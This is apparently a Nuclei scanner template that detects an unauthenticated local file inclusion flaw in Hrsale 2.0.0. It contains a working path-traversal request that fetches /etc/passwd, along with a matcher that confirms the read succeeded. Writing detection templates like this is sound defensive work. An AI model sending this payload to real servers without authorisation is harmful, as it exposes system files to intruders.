id: hrsale-unauthenticated-lfi

info:
  name: Hrsale 2.0.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session
  reference:
    - https://www.exploit-db.com/exploits/48920
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: hrsale,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502205d8da26caa1f9a6e6bed6ce5438954cd3ae937fa03b8cebf06f5ae4b9b3107c70221008d7fff0fdaa8d82a6706618fcf4b82ae6e5b708d220e5516d0f3a7f2481969e3:922c64590222798bb761d5b6d8e72950
